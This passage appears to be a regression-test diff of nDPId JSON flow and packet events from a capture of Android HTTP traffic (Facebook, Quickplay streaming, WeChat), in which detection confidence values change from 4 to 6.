00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1429000037771,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"thread_ts_msec":1429000037771,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUMgAkAArQYAVK38ShYKNqn6AFDMQGR3Qx6qvJUxUBj\/\/2USAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogSENQcUMxYW5HZGxXZUVqMEIwU3F1MHVIQzU2N3BTRzJERlZvSXdHYmRXNFovN1dydjVhM0ZQZEY5V1FIMDUrNFREZVFXV3FiZjA4djA4c1RURE81VWc9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxNyBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"} 00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1429000039509,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":365,"pkt_l4_len":329,"thread_ts_msec":1429000039509,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAV1DA0AAPwaoIgo2qfp4HCMpxewAUEHDig\/6xw2tUBgAhzcPAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9tb3ZpZXMvNjI0MT9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} 01019{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1429000039809,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":476,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":476,"pkt_l4_len":440,"thread_ts_msec":1429000039809,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAcw50kAAPwaw5Ao2qfp4HCMpxe0AUOei9TYRmPaxUBgAh2m5AABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9tb3JlTGlrZVRoaXM\/YXBpS2V5PXF3ZXJ0eSZjb250ZW50UmF0aW5nPTIwJmRldmljZT1hbmRyb2lkbW9iaWxlJmdlbnJlPSUyOFRocmlsbGVyK0FjdGlvbkFkdmVudHVyZSslMjkmbGFuZ3VhZ2U9JTI4ZW5nKyUyOSZsb2NhbGU9ZW5nJm5ldHdvcms9V0lGSSZwYWdlTnVtYmVyPTEmcGFnZVNpemU9NTAmcmVzb3VyY2VJZD02MjQxJnJlc291cmNlVHlwZT1tb3ZpZSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000041481,"flow_last_seen":1429000041481,"flow_idle_time":7580000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1429000041481,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1429000041481,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":237,"pkt_l4_len":201,"thread_ts_msec":1429000041481,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAN24s0AAQAZp+Qo2qfofDUQxrvkAUHO25ZtSV776UBgBtoUeAABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC4yOyBHVC1JOTUwNSBCdWlsZC9LT1Q0OUgpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} -00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000041481,"flow_last_seen":1429000041481,"flow_idle_time":7580000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1429000041481,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; GT-I9505 Build\/KOT49H)"}} +00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000041481,"flow_last_seen":1429000041481,"flow_idle_time":7580000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1429000041481,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; GT-I9505 Build\/KOT49H)"}} 00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1429000041819,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"thread_ts_msec":1429000041819,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUNnpEAArQZNhh8NRDEKNqn6AFCu+VJXvvpztuZQUBgIIrdJAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogajRyR1VwRDFrR0J2VWIvajBNRVhMMnlyRzg0NlVLcDBDV2hLNFFWcTB4K0hLUDR5UVIxR09sVWtXUFkvRGJKNnNKU1pTSWdIdGF1L04xQjF2cTNteXc9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoyMSBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000048159,"flow_last_seen":1429000048159,"flow_idle_time":7580000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":487,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":487,"midstream":1,"thread_ts_msec":1429000048159,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01108{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1429000048159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":543,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":543,"pkt_l4_len":507,"thread_ts_msec":1429000048159,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAg\/pGUAAPwYfWgo2qfp4HAUprOAAUG\/tOAJjh+GeUBg5CMy9AABHRVQgL3ZzdGIvcGxheWxpc3RfNV82MjQxXzM1Ny5tM3U4P2FjdGlvbj0xNDUmYXBwSWQ9NTAwNiZjYXJyaWVySWQ9MjMmYXBwVmVyc2lvbj0xLjAmY29udGVudElkPTYyNDEmY29udGVudFR5cGVJZD0zJmRldmljZU5hbWU9YW5kcm9pZG1vYmlsZSZlbmNvZGluZ0lkPTM1NyZkcm1JZD00JmRybVZlcnNpb249MS41JmRlbGl2ZXJ5PTUmcHJlZkxhbmd1YWdlPWVuZyZ3ZWJ2dHQ9dHJ1ZSZ1c2VyaWQ9MDkxNTQ5NzQ1MzYmdnN0YnR5cGU9c3RyZWFtaW5nIEhUVFAvMS4xDQpIb3N0OiBwbGF5LXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgQnVpbGQvS1RVODRQKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvMzMuMC4wLjAgTW9iaWxlIFNhZmFyaS81MzcuMzYNCg0K"} -01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000048159,"flow_last_seen":1429000048159,"flow_idle_time":7580000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":487,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":487,"midstream":1,"thread_ts_msec":1429000048159,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"play-singtelhawk.quickplay.com","url":"play-singtelhawk.quickplay.com\/vstb\/playlist_5_6241_357.m3u8?action=145&appId=5006&carrierId=23&appVersion=1.0&contentId=6241&contentTypeId=3&deviceName=androidmobile&encodingId=357&drmId=4&drmVersion=1.5&delivery=5&prefLanguage=eng&webvtt=true&userid=09154974536&vstbtype=streaming","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000048159,"flow_last_seen":1429000048159,"flow_idle_time":7580000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":487,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":487,"midstream":1,"thread_ts_msec":1429000048159,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"play-singtelhawk.quickplay.com","url":"play-singtelhawk.quickplay.com\/vstb\/playlist_5_6241_357.m3u8?action=145&appId=5006&carrierId=23&appVersion=1.0&contentId=6241&contentTypeId=3&deviceName=androidmobile&encodingId=357&drmId=4&drmVersion=1.5&delivery=5&prefLanguage=eng&webvtt=true&userid=09154974536&vstbtype=streaming","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 01108{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1429000048647,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":543,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":543,"pkt_l4_len":507,"thread_ts_msec":1429000048647,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAg\/pGkAAPwYfWQo2qfp4HAUprOAAUG\/tOAJjh+GeUBg5CMy9AABHRVQgL3ZzdGIvcGxheWxpc3RfNV82MjQxXzM1Ny5tM3U4P2FjdGlvbj0xNDUmYXBwSWQ9NTAwNiZjYXJyaWVySWQ9MjMmYXBwVmVyc2lvbj0xLjAmY29udGVudElkPTYyNDEmY29udGVudFR5cGVJZD0zJmRldmljZU5hbWU9YW5kcm9pZG1vYmlsZSZlbmNvZGluZ0lkPTM1NyZkcm1JZD00JmRybVZlcnNpb249MS41JmRlbGl2ZXJ5PTUmcHJlZkxhbmd1YWdlPWVuZyZ3ZWJ2dHQ9dHJ1ZSZ1c2VyaWQ9MDkxNTQ5NzQ1MzYmdnN0YnR5cGU9c3RyZWFtaW5nIEhUVFAvMS4xDQpIb3N0OiBwbGF5LXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgQnVpbGQvS1RVODRQKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvMzMuMC4wLjAgTW9iaWxlIFNhZmFyaS81MzcuMzYNCg0K"} 02025{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1429000048795,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1225,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1225,"pkt_l4_len":1189,"thread_ts_msec":1429000048795,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBLkvDEAArAZpoXgcBSkKNqn6AFCs4GOH5p5v7TnpUBj\/\/xfxAABfMjA1NDAzM19GRUFUVVJFX0VOR0xJU0hfMl8wX0xUUlRfMjM5NzZmcHNfNzgzNDE5Mi5tMnRfU1RWMjBSMTkyLWluZGV4Lm0zdTg\/ZT0xNDI4OTk5Njk5Jmg9NDQ1MmM4NzAxMzM0YjUwMzg1ZGQxMjA0N2RjZjY2NmIKI0VYVC1YLVNUUkVBTS1JTkY6UFJPR1JBTS1JRD0xLEJBTkRXSURUSD0zNTgwOTMKaHR0cDovL3ZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWMjUwUjI0MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFYyNTBSMjQwLWluZGV4Lm0zdTg\/ZT0xNDI4OTk5Njk5Jmg9YTVjNmMyY2MzYjk1Y2FiMzhkN2Y2NzgxMWQzOWZkZmEKI0VYVC1YLVNUUkVBTS1JTkY6UFJPR1JBTS1JRD0xLEJBTkRXSURUSD00NTMyNjEKaHR0cDovL3ZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvVFZYVjMyMFIyNDAvcXBtZXp6LUhhd2tfRGlnaXRhbF9DT05UQUdJT05fMjA1NDAzM19GRUFUVVJFX0VOR0xJU0hfMl8wX0xUUlRfMjM5NzZmcHNfNzgzNDE5Mi5tMnRfVFZYVjMyMFIyNDAtaW5kZXgubTN1OD9lPTE0Mjg5OTk2OTkmaD1kNzg4ZWRhZWY4ZDI0ZWQ0M2YyZTFiM2YwMWE2ZmI0NgojRVhULVgtU1RSRUFNLUlORjpQUk9HUkFNLUlEPTEsQkFORFdJRFRIPTY4OTU1MwpodHRwOi8vdm9kLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20vc2VnL3ZvbDEvcy9XYXJuZXIvcXBtZXp6aGF3a2RpZ2l0YWxjb250YWdpb24yMDU0MDMzZmVhdHVyZWVuZ2xpc2gyMGx0cnQyMzk3NmZwczc4MzQxOTIvMjAxNS0wMi0wMi9TVFY1MTBSMzYwL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjUxMFIzNjAtaW5kZXgubTN1OD9lPTE0Mjg5OTk2OTkmaD1hMWI3ZDFmNTY3NzYxMDNkNTU4OTU2YWQwYWY2YTU2Mw=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000049060,"flow_last_seen":1429000049060,"flow_idle_time":7580000,"flow_min_l4_payload_len":527,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":527,"flow_avg_l4_payload_len":527,"midstream":1,"thread_ts_msec":1429000049060,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01162{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1429000049060,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":583,"pkt_l4_len":547,"thread_ts_msec":1429000049060,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAjfkbUAAPwYF3wo2qfp4HCMoyycAUPhJNRwVgNsjUBgBybAbAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi1pbmRleC5tM3U4P2U9MTQyODk5OTY5OSZoPTgzZGEwNzg3NTkwYTdhNDUwMTYzYmJkN2E2Zjk3NGNhIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -01197{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000049060,"flow_last_seen":1429000049060,"flow_idle_time":7580000,"flow_min_l4_payload_len":527,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":527,"flow_avg_l4_payload_len":527,"midstream":1,"thread_ts_msec":1429000049060,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-index.m3u8?e=1428999699&h=83da0787590a7a450163bbd7a6f974ca","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01197{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000049060,"flow_last_seen":1429000049060,"flow_idle_time":7580000,"flow_min_l4_payload_len":527,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":527,"flow_avg_l4_payload_len":527,"midstream":1,"thread_ts_msec":1429000049060,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-index.m3u8?e=1428999699&h=83da0787590a7a450163bbd7a6f974ca","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 01050{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1429000049272,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"thread_ts_msec":1429000049272,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeTkfkAAPwYGIQo2qfp4HCMoyycAUPhJNysVgOaYUBgDEEglAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDAxLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000050062,"flow_last_seen":1429000050062,"flow_idle_time":7580000,"flow_min_l4_payload_len":540,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":540,"midstream":1,"thread_ts_msec":1429000050062,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01184{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1429000050062,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":596,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":596,"pkt_l4_len":560,"thread_ts_msec":1429000050062,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAkSlZkAAPwZ8rwo2qfrLzZeg1mMAUMsBdKl7s0qnUBgAbhITAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1zbnNzeW5jIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMjc1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGtleHRzaG9ydC53ZWl4aW4ucXEuY29tDQpVc2VyLUFnZW50OiBNaWNyb01lc3NlbmdlciBDbGllbnQNCg0KjV8mAQBBVSvQfd8CEAIXSGRsPmwM34SDANYBswPsAcTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYedk0uwBKYCKwk1caV589saz0xALfFf\/iYFlFx1AxUdy484YNnqVDF8K+kVH3f2c9yoInZasFWfv137RkUwmCH+br0dsm2pY5PlW8IbHQGBJKkdj6f6t1lujHjoakqif1dkWjRkTjcDfsFtBglw4jP18zIVy+uqXK+1IUwvsPz80+hSVjN5hP25Llmt\/ESe34eB\/LJMU4AkN\/2f0FWCACM2tXWSzYfJGQOBiLS2DO0iM0="} -00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000050062,"flow_last_seen":1429000050062,"flow_idle_time":7580000,"flow_min_l4_payload_len":540,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":540,"midstream":1,"thread_ts_msec":1429000050062,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","ndpi": 